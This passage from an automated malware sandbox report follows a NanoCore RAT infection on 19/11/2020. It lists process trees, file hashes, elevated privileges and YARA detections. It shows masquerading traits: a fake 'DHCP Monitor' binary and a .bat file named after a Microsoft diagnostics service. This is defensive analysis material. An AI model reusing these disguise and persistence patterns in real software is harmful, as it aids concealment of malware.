                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.517282808.00000000014E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.517388290.00000000015DF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          Reputation:low

                                                                                          Analysis Process: RegAsm.exe PID: 4560 Parent PID: 2152

                                                                                          General

                                                                                          Start time:01:52:28
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          Imagebase:0x590000
                                                                                          File size:53248 bytes
                                                                                          MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.521308096.0000000003B97000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.514055091.0000000000402000.00000020.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.522748241.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.522934984.00000000054B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:high

                                                                                          Analysis Process: dhcpmon.exe PID: 6488 Parent PID: 3292

                                                                                          General

                                                                                          Start time:01:52:38
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                                                          Imagebase:0x270000
                                                                                          File size:53248 bytes
                                                                                          MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Antivirus matches:
                                                                                          • Detection: 0%, Metadefender, Browse
                                                                                          • Detection: 0%, ReversingLabs
                                                                                          Reputation:high

                                                                                          Analysis Process: conhost.exe PID: 6508 Parent PID: 6488

                                                                                          General

                                                                                          Start time:01:52:39
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff774ee0000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Analysis Process: DiagnosticsHub.StandardCollector.Service.exe.bat PID: 6976 Parent PID: 3292

                                                                                          General

                                                                                          Start time:01:52:47
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat'
                                                                                          Imagebase:0x980000
                                                                                          File size:1124896 bytes
                                                                                          MD5 hash:E10CD6FAB33374FB1A0002F89D0BFE45
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.307122093.0000000000E1F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          Reputation:low

                                                                                          Analysis Process: RegAsm.exe PID: 7108 Parent PID: 6976

                                                                                          General

                                                                                          Start time:01:52:51
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          Imagebase:0xa80000
                                                                                          File size:53248 bytes
                                                                                          MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          Reputation:high

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >